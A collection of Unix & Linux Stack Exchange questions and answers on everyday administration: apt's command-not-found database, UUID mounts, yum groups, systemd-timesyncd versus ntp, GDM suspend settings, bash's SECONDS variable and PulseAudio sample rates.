    if not cnf.advise(args[0], options.ignore_installed) and not options.no_failure_msg:
UnboundLocalError: local variable 'cnf' referenced before assignment

Issuing update-command-not-found as root does not fix the problem. There is a bug report, but it seems there is no fix yet.
Not intuitive, but the error goes away immediately after apt update:

# apt update
Hit:1 http://deb.debian.org/debian buster InRelease
Get:2 http://deb.debian.org/debian buster-updates InRelease [49.3 kB]
Hit:3 http://security.debian.org/debian-security buster/updates InRelease
Get:4 http://deb.debian.org/debian buster/main amd64 Contents (deb) [36.1 MB]
Get:5 http://deb.debian.org/debian buster-updates/main amd64 Contents (deb) [42.3 kB]
Fetched 36.2 MB in 7s (5,009 kB/s)
Reading package lists... Done
Building dependency tree
Reading state information... Done
All packages are up to date.
# curl
Command 'curl' not found, but can be installed with:
apt install curl

PS. For those curious, the reason for that is a missing db upon fresh install:

ls -l /var/lib/command-not-found
total 0

and after apt update we have:

ls -l /var/lib/command-not-found
total 2504
-rw-r--r-- 1 root root 2560000 Jul 29 12:34 commands.db
-rw-r--r-- 1 root root     983 Jul 29 12:34 commands.db.metadata
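If the machine should never sit in that state, the list refresh can be automated with APT's stock periodic settings; a minimal sketch:

# /etc/apt/apt.conf.d/02periodic
APT::Periodic::Enable "1";
APT::Periodic::Update-Package-Lists "1";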
{ "score": 4, "source": [ "https://unix.stackexchange.com/questions/585107", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/100512/" ] }
585,162
Is it possible to use UUIDs to mount drives, rather than using these values in fstab? I have a script which mounts devices, however there is no way to guarantee that the drive labels such as /dev/sda2 will always be the same. I'm aware I can mount the drive at boot time using this method with fstab , however in the case of external disks, they may not always be present at boot time.
Yes it's possible, you just use the UUID option:

lsblk -o NAME,UUID
NAME   UUID
sdc
├─sdc1 A190-92D5
└─sdc2 A198-A7BC

sudo mount -U A198-A7BC /mnt

Or

sudo mount UUID=A198-A7BC /mnt

Or

sudo mount --uuid A198-A7BC /mnt

From mount --help:

Source:
 -L, --label <label>     synonym for LABEL=<label>
 -U, --uuid <uuid>       synonym for UUID=<uuid>
 LABEL=<label>           specifies device by filesystem label
 UUID=<uuid>             specifies device by filesystem UUID
 PARTLABEL=<label>       specifies device by partition label
 PARTUUID=<uuid>         specifies device by partition UUID
 <device>                specifies device by path
 <directory>             mountpoint for bind mounts (see --bind/rbind)
 <file>                  regular file for loopdev setup
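The same UUID works in /etc/fstab. For an external disk that may be absent at boot, nofail keeps its absence from blocking the boot; the mount point and filesystem type below are placeholders:

# /etc/fstab
UUID=A198-A7BC  /mnt/usb  vfat  defaults,nofail,x-systemd.device-timeout=10  0  0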
{ "score": 6, "source": [ "https://unix.stackexchange.com/questions/585162", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/32864/" ] }
585,170
I want to add one blank space after any occurrence of: <span class="negrita">ANYTHING</span> So, with this SED instruction: sed -E "s/(<span class=\"negrita\">.*?<\/span>)/\1 /g" <<< 'In <span class="negrita">1959</span> economic policy was reoriented in order to undertake <span class="negrita">the country modernization</span>. More text' I get this output: In <span class="negrita">1959</span> economic policy was reoriented in order to undertake <span class="negrita">the country modernization</span> . More text So, as you can see, it is adding the blank space after the last occurrence, but not after the first one. Isn't the "/g" option meant to indicate that it should replace all occurrences? Thanks in advance.
{ "score": 6, "source": [ "https://unix.stackexchange.com/questions/585170", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/411171/" ] }
585,212
While watching top some process flashed before my eyes with strange USER -column debian-+ . I checked that this particular process belongs to /usr/bin/tor . But I can't see the user debian-+ in Linux files like e.g. /etc/passwd . There is only debian-tor user there. So what is the need for user debian-+ ? Is it only related to tor or something else?
It’s the debian-tor user, but top truncates it to debian-+ (the + indicates that the value was truncated). The default width for the USER column is 8 characters, and the column doesn’t scale with its contents. The width can be adjusted with X while top is running.
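Outside of top, ps can be asked for a wider user column directly, which sidesteps the truncation (the :20 sets the column width and -C selects processes by command name):

ps -o user:20,pid,comm -C tor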
{ "score": 5, "source": [ "https://unix.stackexchange.com/questions/585212", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/165555/" ] }
585,233
If you see, these are my two partitions, 1 and 2 [screenshot]. Now if we look at the partition level, sda2 is a total of 149.5G, i.e. root, swap and home of 50G, 3.8G and 25.7G each, but that still does not add up to the total size of the partition. So my question is: where is that 149.5 - (50 + 3.8 + 25.7), i.e. the ~70G, and how can I retrieve this space and use it?

EDIT 1: vgs [screenshot]
EDIT 2: pvs [screenshot]
EDIT 3: Ran pvresize /dev/sda2, which gave pvs and vgs as [screenshot]
EDIT 4: Ran lvresize -l +100%FREE /dev/vg_relcertlin2/lv_root but df -hT and lsblk are showing different output [screenshot]
{ "score": 5, "source": [ "https://unix.stackexchange.com/questions/585233", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/354177/" ] }
585,247
Is there any way to use uniq (or similar) to filter/remove sets of repeating lines from log-type output? I am debugging an MPI code where multiple processors often print the same exact output. uniq works great when the output is one line, but frequently the code will generate multiple lines. Here's an example:

calling config()
calling config()
calling config()
running main loop time=0
running main loop time=0
running main loop time=0
output from Rank 0

gets filtered with uniq (without options) to:

calling config()
running main loop time=0
running main loop time=0
running main loop time=0
output from Rank 0

Is there an easy way to filter n-line blocks? I've read and reread the manpage but can't find anything obvious. Thanks!

UPDATE: I'd like the output to have duplicated blocks condensed down to a single entry, so in the case of the example above:

calling config()
running main loop time=0
output from Rank 0
$ awk '!a[$0]++' file
calling config()
running main loop
time=0
output from Rank 0
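If whole fixed-size blocks rather than single lines should be collapsed, one hedged sketch for two-line blocks joins each pair, deduplicates, then splits again; it assumes an even line count and that the byte \x01 never occurs in the data:

paste -d $'\x01' - - < file | awk '!a[$0]++' | tr $'\x01' '\n'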
{ "score": 4, "source": [ "https://unix.stackexchange.com/questions/585247", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/411248/" ] }
585,248
We know that the cd command is used to change directories. For example cd dirname valid dirnames include . and .. as well. The purpose of cd .. is clear. From the manpage: A null directory name in CDPATH is the same as the current directory, i.e., ''.''. But then what is the purpose of cd . ?
The effect of cd . is to update the shell with information about what the current working directory is. This could be useful in circumstances when the (pathname of the) current directory changes by other means than through cd.

$ pwd
/tmp/shell-bash.OoVntBAM
$ mkdir dir
$ cd dir
$ pwd
/tmp/shell-bash.OoVntBAM/dir

So, we're currently some place under /tmp, in a directory called dir. Let's rename the directory we're currently in.

$ mv ../dir ../new-dir

So, where are we now?

$ pwd
/tmp/shell-bash.OoVntBAM/dir

Really? Why, that's odd. Let's make sure the shell knows where we are.

$ cd .
$ pwd
/tmp/shell-bash.OoVntBAM/new-dir

In a script, cd . could possibly be used to test whether the user still has access to the current directory:

if ! cd . 2>/dev/null; then
    echo lost access to cwd >&2
    exit 1
fi

Or, the other way around, to verify that the current directory is no longer accessible after some sort of operation to revoke access for the current user. Reasons for losing access to the current directory include having the directory removed, or someone removing one's execute permissions on it.

Another example is using cd ., but with the -P option, i.e. cd -P . This would put you in the "physical" directory if the current directory was otherwise accessed through a symbolic link:

$ pwd
/tmp/shell-bash.OoVntBAM
$ mkdir dir
$ ln -s dir link-dir
$ ls -l
total 2
drwxr-xr-x 3 kk wheel 512 May 8 00:48 dir
lrwxr-xr-x 1 kk wheel   3 May 8 00:46 link-dir -> dir

So now we have a directory, dir, and a symbolic link to that directory. Let's enter the directory through the symbolic link:

$ cd link-dir
$ pwd
/tmp/shell-bash.OoVntBAM/link-dir

Then...

$ cd -P .
$ pwd
/tmp/shell-bash.OoVntBAM/dir
{ "score": 4, "source": [ "https://unix.stackexchange.com/questions/585248", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/294996/" ] }
585,275
I'm running CentOS 7. I want to install gcc (for the purposes of building Python 3 with the new openssl package I installed). I was reading here -- https://stackoverflow.com/questions/19816275/no-acceptable-c-compiler-found-in-path-when-installing-python , that installing "Development Tools" was the truth and the light. But I don't seem to be able to ... (venv) [rails@server Python-3.7.0]$ sudo yum groupinstall "Development Tools"[sudo] password for rails: Loaded plugins: fastestmirrorLoading mirror speeds from cached hostfile * base: mirror.mi.incx.net * epel: mirror.us-midwest-1.nexcess.net * extras: mirror.cs.pitt.edu * updates: mirror.pit.teraswitch.comMaybe run: yum groups mark install (see man yum)No packages in any requested group available to install or update Here's some extra info about my system if needed (venv) [rails@server Python-3.7.0]$ uname -aLinux server 2.6.32-042stab120.19 #1 SMP Mon Feb 20 20:05:53 MSK 2017 x86_64 x86_64 x86_64 GNU/Linux Edit: Adding results as suggested by answer ... [rails@server ~]$ sudo yum groups mark install "Development Tools"[sudo] password for rails: Loaded plugins: fastestmirrorLoading mirror speeds from cached hostfile * base: ftp.ussg.iu.edu * epel: mirror.us-midwest-1.nexcess.net * extras: mirror.cs.uwp.edu * updates: mirror.pit.teraswitch.comMarked install: Development Tools[rails@server ~]$ sudo yum groups mark convert "Development Tools"Loaded plugins: fastestmirrorLoading mirror speeds from cached hostfile * base: ftp.ussg.iu.edu * epel: mirror.us-midwest-1.nexcess.net * extras: mirror.cs.uwp.edu * updates: mirror.pit.teraswitch.comConverted old style groups to objects.[rails@server ~]$ sudo yum groupinstall "Development Tools"Loaded plugins: fastestmirrorLoading mirror speeds from cached hostfile * base: ftp.ussg.iu.edu * epel: mirror.us-midwest-1.nexcess.net * extras: mirror.cs.uwp.edu * updates: mirror.pit.teraswitch.comMaybe run: yum groups mark install (see man yum)No packages in any requested group available to install or update Edit 2 More output in response to comments from answers ... [rails@server ~]$ sudo yum groupinstall "Development Tools" --setopt=group_package_types=mandatory,default,optionalLoaded plugins: fastestmirrorLoading mirror speeds from cached hostfile * base: mirror.vcu.edu * epel: mirror.us-midwest-1.nexcess.net * extras: ftp.osuosl.org * updates: mirror.mi.incx.netMaybe run: yum groups mark install (see man yum)No packages in any requested group available to install or update and this ... 
[rails@server ~]$ sudo yum grouplistLoaded plugins: fastestmirrorLoading mirror speeds from cached hostfile * base: mirror.vcu.edu * epel: mirror.us-midwest-1.nexcess.net * extras: repo1.ash.innoscale.net * updates: mirror.mi.incx.netAvailable Environment Groups: Minimal Install Compute Node Infrastructure Server File and Print Server Cinnamon Desktop MATE Desktop Basic Web Server Virtualization Host Server with GUI GNOME Desktop KDE Plasma Workspaces Development and Creative WorkstationInstalled Groups: Console Internet Tools Development Tools Electronic Lab Legacy UNIX Compatibility Milkymist PostgreSQL Database Server 9.6 PGDG Security Tools System Administration ToolsAvailable Groups: Cinnamon Compatibility Libraries Educational Software Fedora Packager General Purpose Desktop Graphical Administration Tools Haskell LXQt Desktop MATE PostgreSQL Database Server 10 PGDG PostgreSQL Database Server 11 PGDG PostgreSQL Database Server 12 PGDG PostgreSQL Database Server 9.5 PGDG Scientific Support Smart Card Support System Management TurboGears application framework XfceDone Edit 3: Output per second suggestion (repolist) ... [rails@server ~]$ sudo yum repolist allLoaded plugins: fastestmirrorLoading mirror speeds from cached hostfile * base: mirror.trouble-free.net * epel: mirror.us-midwest-1.nexcess.net * extras: mirror.pit.teraswitch.com * updates: mirrors.gigenet.comrepo id repo name statusC7.0.1406-base/x86_64 CentOS-7.0.1406 - Base disabledC7.0.1406-centosplus/x86_64 CentOS-7.0.1406 - CentOSPlus disabledC7.0.1406-extras/x86_64 CentOS-7.0.1406 - Extras disabledC7.0.1406-fasttrack/x86_64 CentOS-7.0.1406 - Fasttrack disabledC7.0.1406-updates/x86_64 CentOS-7.0.1406 - Updates disabledC7.1.1503-base/x86_64 CentOS-7.1.1503 - Base disabledC7.1.1503-centosplus/x86_64 CentOS-7.1.1503 - CentOSPlus disabledC7.1.1503-extras/x86_64 CentOS-7.1.1503 - Extras disabledC7.1.1503-fasttrack/x86_64 CentOS-7.1.1503 - Fasttrack disabledC7.1.1503-updates/x86_64 CentOS-7.1.1503 - Updates disabledC7.2.1511-base/x86_64 CentOS-7.2.1511 - Base disabledC7.2.1511-centosplus/x86_64 CentOS-7.2.1511 - CentOSPlus disabledC7.2.1511-extras/x86_64 CentOS-7.2.1511 - Extras disabledC7.2.1511-fasttrack/x86_64 CentOS-7.2.1511 - Fasttrack disabledC7.2.1511-updates/x86_64 CentOS-7.2.1511 - Updates disabledC7.3.1611-base/x86_64 CentOS-7.3.1611 - Base disabledC7.3.1611-centosplus/x86_64 CentOS-7.3.1611 - CentOSPlus disabledC7.3.1611-extras/x86_64 CentOS-7.3.1611 - Extras disabledC7.3.1611-fasttrack/x86_64 CentOS-7.3.1611 - Fasttrack disabledC7.3.1611-updates/x86_64 CentOS-7.3.1611 - Updates disabledC7.4.1708-base/x86_64 CentOS-7.4.1708 - Base disabledC7.4.1708-centosplus/x86_64 CentOS-7.4.1708 - CentOSPlus disabledC7.4.1708-extras/x86_64 CentOS-7.4.1708 - Extras disabledC7.4.1708-fasttrack/x86_64 CentOS-7.4.1708 - Fasttrack disabledC7.4.1708-updates/x86_64 CentOS-7.4.1708 - Updates disabledC7.5.1804-base/x86_64 CentOS-7.5.1804 - Base disabledC7.5.1804-centosplus/x86_64 CentOS-7.5.1804 - CentOSPlus disabledC7.5.1804-extras/x86_64 CentOS-7.5.1804 - Extras disabledC7.5.1804-fasttrack/x86_64 CentOS-7.5.1804 - Fasttrack disabledC7.5.1804-updates/x86_64 CentOS-7.5.1804 - Updates disabledC7.6.1810-base/x86_64 CentOS-7.6.1810 - Base disabledC7.6.1810-centosplus/x86_64 CentOS-7.6.1810 - CentOSPlus disabledC7.6.1810-extras/x86_64 CentOS-7.6.1810 - Extras disabledC7.6.1810-fasttrack/x86_64 CentOS-7.6.1810 - Fasttrack disabledC7.6.1810-updates/x86_64 CentOS-7.6.1810 - Updates disabledC7.7.1908-base/x86_64 CentOS-7.7.1908 - Base 
disabledC7.7.1908-centosplus/x86_64 CentOS-7.7.1908 - CentOSPlus disabledC7.7.1908-extras/x86_64 CentOS-7.7.1908 - Extras disabledC7.7.1908-fasttrack/x86_64 CentOS-7.7.1908 - Fasttrack disabledC7.7.1908-updates/x86_64 CentOS-7.7.1908 - Updates disabledbase/7/x86_64 CentOS-7 - Base enabled: 10,070base-debuginfo/x86_64 CentOS-7 - Debuginfo disabledbase-source/7 CentOS-7 - Base Sources disabledc7-media CentOS-7 - Media disabledcentos-kernel/7/x86_64 CentOS LTS Kernels for x86_64 disabledcentos-kernel-experimental/7/x86_64 CentOS Experimental Kernels for x86_64 disabledcentosplus/7/x86_64 CentOS-7 - Plus disabledcentosplus-source/7 CentOS-7 - Plus Sources disabledcr/7/x86_64 CentOS-7 - cr disabledepel/x86_64 Extra Packages for Enterprise Linux 7 - x86_64 enabled: 13,266epel-debuginfo/x86_64 Extra Packages for Enterprise Linux 7 - x86_64 - Debug disabledepel-source/x86_64 Extra Packages for Enterprise Linux 7 - x86_64 - Source disabledepel-testing/x86_64 Extra Packages for Enterprise Linux 7 - Testing - x86_64 disabledepel-testing-debuginfo/x86_64 Extra Packages for Enterprise Linux 7 - Testing - x86_64 - Debug disabledepel-testing-source/x86_64 Extra Packages for Enterprise Linux 7 - Testing - x86_64 - Source disabledextras/7/x86_64 CentOS-7 - Extras enabled: 392extras-source/7 CentOS-7 - Extras Sources disabledfasttrack/7/x86_64 CentOS-7 - fasttrack disabledgoogle-chrome google-chrome enabled: 3pgdg-common/7/x86_64 PostgreSQL common RPMs for RHEL/CentOS 7 - x86_64 enabled: 288pgdg-common-srpm-testing/7/x86_64 PostgreSQL common testing SRPMs for RHEL/CentOS 7 - x86_64 disabledpgdg-common-testing/7/x86_64 PostgreSQL common testing RPMs for RHEL/CentOS 7 - x86_64 disabledpgdg-source-common/7/x86_64 PostgreSQL 12 for RHEL/CentOS 7 - x86_64 - Source disabledpgdg10/7/x86_64 PostgreSQL 10 for RHEL/CentOS 7 - x86_64 enabled: 626pgdg10-source/7/x86_64 PostgreSQL 10 for RHEL/CentOS 7 - x86_64 - Source disabledpgdg10-updates-debuginfo/7/x86_64 PostgreSQL 10 for RHEL/CentOS 7 - x86_64 - Debuginfo disabledpgdg11/7/x86_64 PostgreSQL 11 for RHEL/CentOS 7 - x86_64 enabled: 623pgdg11-source/7/x86_64 PostgreSQL 11 for RHEL/CentOS 7 - x86_64 - Source disabledpgdg11-source-updates-testing/7/x86_64 PostgreSQL 11 for RHEL/CentOS 7 - x86_64 - Source update testing disabledpgdg11-updates-debuginfo/7/x86_64 PostgreSQL 11 for RHEL/CentOS 7 - x86_64 - Debuginfo disabledpgdg11-updates-testing/7/x86_64 PostgreSQL 11 for RHEL/CentOS 7 - x86_64 - Updates testing disabledpgdg11-updates-testing-debuginfo/7/x86_64 PostgreSQL 11 for RHEL/CentOS 7 - x86_64 - Debuginfo disabledpgdg12/7/x86_64 PostgreSQL 12 for RHEL/CentOS 7 - x86_64 enabled: 317pgdg12-source/7/x86_64 PostgreSQL 12 for RHEL/CentOS 7 - x86_64 - Source disabledpgdg12-source-updates-testing/7/x86_64 PostgreSQL 12 for RHEL/CentOS 7 - x86_64 - Source update testing disabledpgdg12-updates-debuginfo/7/x86_64 PostgreSQL 12 for RHEL/CentOS 7 - x86_64 - Debuginfo disabledpgdg12-updates-testing/7/x86_64 PostgreSQL 12 for RHEL/CentOS 7 - x86_64 - Updates testing disabledpgdg12-updates-testing-debuginfo/7/x86_64 PostgreSQL 12 for RHEL/CentOS 7 - x86_64 - Debuginfo disabledpgdg13-source-updates-testing/7/x86_64 PostgreSQL 13 for RHEL/CentOS 7 - x86_64 - Source updates testing disabledpgdg13-updates-debuginfo/7/x86_64 PostgreSQL 13 for RHEL/CentOS 7 - x86_64 - Debuginfo disabledpgdg13-updates-testing/7/x86_64 PostgreSQL 13 for RHEL/CentOS 7 - x86_64 - Updates testing disabledpgdg13-updates-testing-debuginfo/7/x86_64 PostgreSQL 13 for RHEL/CentOS 7 - x86_64 - Debuginfo 
disabled!pgdg94/7/x86_64 PostgreSQL 9.4 for RHEL/CentOS 7 - x86_64 disabledpgdg94-source/7/x86_64 PostgreSQL 9.4 for RHEL/CentOS 7 - x86_64 - Source disabledpgdg95/7/x86_64 PostgreSQL 9.5 for RHEL/CentOS 7 - x86_64 enabled: 572pgdg95-source/7/x86_64 PostgreSQL 9.5 for RHEL/CentOS 7 - x86_64 - Source disabledpgdg95-updates-debuginfo/7/x86_64 PostgreSQL 9.5 for RHEL/CentOS 7 - x86_64 - Debuginfo disabledpgdg96/7/x86_64 PostgreSQL 9.6 for RHEL/CentOS 7 - x86_64 enabled: 603pgdg96-source/7/x86_64 PostgreSQL 9.6 for RHEL/CentOS 7 - x86_64 - Source disabledpgdg96-updates-debuginfo/7/x86_64 PostgreSQL 9.6 for RHEL/CentOS 7 - x86_64 - Debuginfo disabledupdates/7/x86_64 CentOS-7 - Updates enabled: 245updates-source/7 CentOS-7 - Updates Sources disabled
In your console output it says: Maybe run: yum groups mark install (see man yum). Did you do this? Try running the following commands:

yum groups mark install "Development Tools"
yum groups mark convert "Development Tools"
yum groupinstall "Development Tools"

Reference: RedHat Customer Portal discussion
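If the group metadata stays broken, a pragmatic fallback for the stated goal (building Python 3 with OpenSSL support) is to install the key packages directly; a sketch with package names from the standard CentOS 7 repos:

sudo yum install gcc gcc-c++ make openssl-devel bzip2-devel libffi-devel zlib-devel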
{ "score": 4, "source": [ "https://unix.stackexchange.com/questions/585275", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/166917/" ] }
585,519
Is there any issue with running systemd-timesyncd and ntp on the same machine? I'm asking this because I have started using NTP on all servers but the systemd-timesyncd is running there as well. Should I disable it? Any issues with both running?
Running both at the same time is not recommended. The two services might be using different NTP servers with slightly different times, so your server would experience time corrections very frequently: time synced by the ntp service would get changed by systemd-timesyncd, and vice versa. You may already know this, but you can disable systemd-timesyncd at boot and stop the running service in one go using:

systemctl disable systemd-timesyncd --now
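To verify which daemon is actually disciplining the clock afterwards, a quick sketch (the NTP unit may be called ntp or ntpd depending on the distribution):

timedatectl status                         # shows whether systemd-timesyncd is in use
systemctl is-active systemd-timesyncd ntp  # exactly one of these should report active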
{ "score": 4, "source": [ "https://unix.stackexchange.com/questions/585519", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/185233/" ] }
585,531
I want my laptop to stay running when it is on A/C power even when it is idle and the lid is closed. I managed to make it not suspend immediately when the lid is closed with:

/etc/systemd/logind.conf:
[Login]
HandleLidSwitch=ignore
HandleLidSwitchExternalPower=ignore
HandleLidSwitchDocked=ignore
IdleAction=ignore
IdleActionSec=1min

But around 1200 seconds after rebooting (no login on gdm) it suspends to RAM. What am I missing?

$ uname -a
Linux nlv 5.4.0-29-generic #33-Ubuntu SMP Wed Apr 29 14:32:27 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
$ cat /etc/issue
Ubuntu 20.04 LTS \n \l
$ cat /etc/systemd/sleep.conf   # comments removed for brevity
[Sleep]
Your logind.conf settings only control what systemd-logind does, but the suspend you are seeing before anyone logs in comes from GDM itself: the greeter runs its own gnome-settings-daemon session, and GNOME's power plugin defaults to sleep-inactive-ac-type 'suspend' with sleep-inactive-ac-timeout 1200, which is exactly the ~1200 seconds you observed. Turn it off for the gdm user and the machine should stay up on AC with the lid closed:

sudo -u gdm dbus-launch gsettings set org.gnome.settings-daemon.plugins.power sleep-inactive-ac-type 'nothing'

then reboot (or restart gdm3).
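On Debian/Ubuntu the same setting can instead be placed in GDM's greeter defaults file, which survives upgrades; a sketch (file path as shipped on Ubuntu 20.04):

# /etc/gdm3/greeter.dconf-defaults
[org/gnome/settings-daemon/plugins/power]
sleep-inactive-ac-type='nothing'

# then restart the display manager to apply it:
sudo systemctl restart gdm3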
{ "score": 4, "source": [ "https://unix.stackexchange.com/questions/585531", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/2972/" ] }
585,579
After installing microk8s (Micro Kubernetes) on my local machine, one of the commands I encountered was microk8s.enable dns which can also be run as microk8s enable dns . This doesn't seem to be a universal thing. git status is a valid command but git.status is not. How do Linux systems support such type of command structures? How can I incorporate this behavior in my Bash scripts?
You'll sometimes see programs (and scripts) inspect the name of the file that was used to invoke the program and condition behavior off of that. Consider for example this file and symbolic link:

$ ls -l
-rwxr-xr-x ... foo
lrwxr-xr-x ... foo.bar -> foo

And the content of the script foo:

#!/bin/bash
readonly command="$(basename "${0}")"
subcommand="$(echo "${command}" | cut -s -d. -f2)"
if [[ "${subcommand}" == "" ]]; then
    subcommand="${1}"
fi
if [[ "${subcommand}" == "" ]]; then
    echo "Error: subcommand not specified" 1>&2
    exit 1
fi
echo "Running ${subcommand}"

The script parses the command name looking for a subcommand (based on the dot notation in your question). With that, I can run ./foo.bar and get the same behavior as running ./foo bar:

$ ./foo.bar
Running bar
$ ./foo bar
Running bar

To be clear, I don't know that that's what microk8s.enable is doing. You could do a ls -li $(which microk8s.enable) $(which microk8s) and compare the files. Is one a link to the other? If not, do they have the same inode number?
{ "score": 4, "source": [ "https://unix.stackexchange.com/questions/585579", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/411571/" ] }
585,585
We are using rhel 7.6 version. We are very surprised that yum-config-manager isn't installed on rhel 7.6 by default, so we downloaded the ISO file of rhel 7.6, mounted all pkgs from rhel 7.6 to /mnt and created the repo for rhel 7.6. So now we try to install the yum-config-manager but:

yum install yum-config-manager
Loaded plugins: langpacks
configuration
No package yum-config-manager available.
Error: Nothing to do

So I do not understand why this pkg/rpm isn't part of the ISO? Update: we did also

yum provides */yum-config-manager
Loaded plugins: langpacks
configuration
InstallMedia/filelists_db | 3.4 MB 00:00:00
yum-utils-1.1.31-50.el7.noarch : Utilities based around the yum package manager
Repo : InstallMedia
Matched from:
Filename : /usr/bin/yum-config-manager
yum-utils-1.1.31-50.el7.noarch : Utilities based around the yum package manager
Repo : @InstallMedia
Matched from:
Filename : /usr/bin/yum-config-manager
The yum-config-manager program is not a standalone package; it is part of the yum-utils package, thus:

yum install yum-utils
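Once yum-utils is in place, a quick sanity check; the repo id epel below is just an example:

yum-config-manager | head               # dump the current repo configuration
sudo yum-config-manager --enable epel   # enable a repo by its id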
{ "score": 4, "source": [ "https://unix.stackexchange.com/questions/585585", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/237298/" ] }
585,646
I am new to bash scripting and started out with a few sample scripts. One is:

#!/bin/bash
SECONDS=5
i=1
while true
do
  echo "`date`: Loop $i"
  i=$(( $i+1 ))
  sleep $SECONDS
done

This results in:

Sunday 10 May 15:08:20 AEST 2020: Loop 1
Sunday 10 May 15:08:25 AEST 2020: Loop 2
Sunday 10 May 15:08:35 AEST 2020: Loop 3
Sunday 10 May 15:08:55 AEST 2020: Loop 4

... and is not what I expected or wanted the script to do. Why would the seconds double every time it runs through the loop?

bash --version
GNU bash, version 4.3.48(1)-release (x86_64-pc-linux-gnu)
Copyright (C) 2013 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
Because SECONDS is an internal variable in bash. It stores the amount of time that the shell has been running. From man bash:

SECONDS
Each time this parameter is referenced, the number of seconds since shell invocation is returned. If a value is assigned to SECONDS, the value returned upon subsequent references is the number of seconds since the assignment plus the value assigned.

So, your script works like this: on first use it accepts the value of 5 as input, so the initial value is 5. Then there is a sleep of 5 seconds; when that sleep returns, the value of SECONDS will be the 5 seconds of the initial value + 5 seconds of the sleep = 10 seconds. Then there is a sleep of 10 seconds (the present value of SECONDS), which plus the previously accumulated 10 seconds gives 20. Then a sleep of 20 seconds plus the previous value of 20 gives 40. Etc.
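The simplest fix is to avoid the reserved name altogether; a sketch of the corrected script:

#!/bin/bash
delay=5   # any name other than SECONDS works
i=1
while true
do
    echo "$(date): Loop $i"
    i=$((i + 1))
    sleep "$delay"
done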
{ "score": 5, "source": [ "https://unix.stackexchange.com/questions/585646", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/180005/" ] }
585,789
When using the h2n as USB mic and playback device, it displays 44.1kHz as sample rate. When pulseaudio restarts, it is detected correctly (pacmd list-sinks):

sample spec: s16le 2ch 44100Hz

Now I start playing a video on youtube and, while it plays, turn the "Profile" of it in "pavucontrol" -> "Configuration" to "off" and back to "Analog Stereo Duplex". Now pulseaudio tells me:

sample spec: s16le 2ch 48000Hz

On a fresh system start it's even enough to just open pavucontrol to cause the wrong sampling rate, which results in a pitched output with a lot of crackling. Stuff I have tried:

1. Make the following changes to ~/.config/pulse/daemon.conf:

default-sample-rate = 44100
avoid-resampling = yes

as suggested in another question (Setting different per-device sampling rates in pulseaudio?) and in https://wiki.archlinux.org/index.php/PulseAudio/Troubleshooting

2. Put

pcm.device {
    format S16_LE
    rate 41000
    type hw
    card 0
    device 0
}
pcm.!default {
    type plug
    slave.pcm "device"
}

into ~/.asoundrc and log out and back in. (https://unix.stackexchange.com/a/141234/227331)

3. Put

pcm.!default {
    type rate
    slave {
        pcm "plughw:0,0"
        rate 44100
    }
}

into ~/.asoundrc as suggested here: https://bbs.archlinux.org/viewtopic.php?pid=400718#p400718 and reboot.

4. Run

pactl list sinks | grep -oP "(?<=device.string = \")(.*)(?=\")" | while read in; do pasuspender -- speaker-test --nloops=1 --channels=2 --test=wav --device=$in; done

as suggested in https://www.freedesktop.org/wiki/Software/PulseAudio/Documentation/Users/Troubleshooting/ — sounds good. Afterwards firefox will resume with crackling noises.
After installing cadence and jack2, adding myself to the audio group (usermod -a -G audio username), logging back in and setting cadence to use the h2n for input and output, things look promising. In pavucontrol I now have a "Jack sink" for output and "Jack source" for input, and I can select those as defaults when I need them. No crackling yet. So basically I need to put JACK between pulseaudio and ALSA to make it work, if I understand the Linux audio environment correctly.

Edit: I have tried to remove pulseaudio completely now. Quite a lot of programs still work, but not all of them. In order to get volume control working I made this: https://github.com/sezanzeb/ALSA-Control . Also see https://unix.stackexchange.com/a/293206/227331

Edit 2: try https://pipewire.org/
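Whichever route you take, the negotiated rate can be re-checked after each change; a small sketch using the same tool as in the question:

pacmd list-sinks | grep -e 'name:' -e 'sample spec'   # confirm 44100Hz stuck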
{ "score": 4, "source": [ "https://unix.stackexchange.com/questions/585789", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/227331/" ] }
585,799
Hope you are having a fantastic week. I'll jump straight to the topic. I'm using xfce-Kali 2020.1b, xfce v4.14. I wanted to assign 'Super' to xfce4-appfinder in place of whiskermenu because it was way more responsive on my chromebook machine. I was able to bind it and use xfce4-appfinder but was unable to disable whiskermenu's shortcut, so they would launch at the same time or one after the other. As far as I understand, whiskermenu used to only launch with a keybind to xfce4-popup-whiskermenu that could be set via the Keyboard app's application shortcuts section. But that caused issues with being unable to use 'Super' for any other shortcut, because the shortcuts set in "~/.config/xfce4/xfconf/xfce-perchannel-xml/xfce4-keyboard-shortcuts.xml" still get activated on press rather than on release, as stated here in xfce's bug tracker. But I don't have this problem. So my best guess is Super was hard-coded to whiskermenu by some party to remedy this bug. I did a grep search on the entire machine to find where the cfg file for this hardcoded Super is but was unsuccessful. All I found was Ctrl+Esc shortcuts, which cause no harm:

$ sudo grep -ri "xfce4-popup-whiskermenu" /* 2>/dev/null
/etc/xdg/xfce4/xfconf/xfce-perchannel-xml/xfce4-keyboard-shortcuts.xml: <property name="&lt;Alt&gt;F1" type="string" value="xfce4-popup-whiskermenu --pointer"/>
/etc/xdg/xfce4/xfconf/xfce-perchannel-xml/xfce4-keyboard-shortcuts.xml: <property name="&lt;Primary&gt;Escape" type="string" value="xfce4-popup-whiskermenu"/>
Binary file /home/thmyris/.mozilla/firefox/gzthh3eo.default-esr/places.sqlite-wal matches
Binary file /home/thmyris/.mozilla/firefox/gzthh3eo.default-esr/places.sqlite matches
/home/thmyris/.config/xfce4/xfconf/xfce-perchannel-xml/xfce4-keyboard-shortcuts.xml: <property name="&lt;Primary&gt;Escape" type="string" value="xfce4-popup-whiskermenu"/>
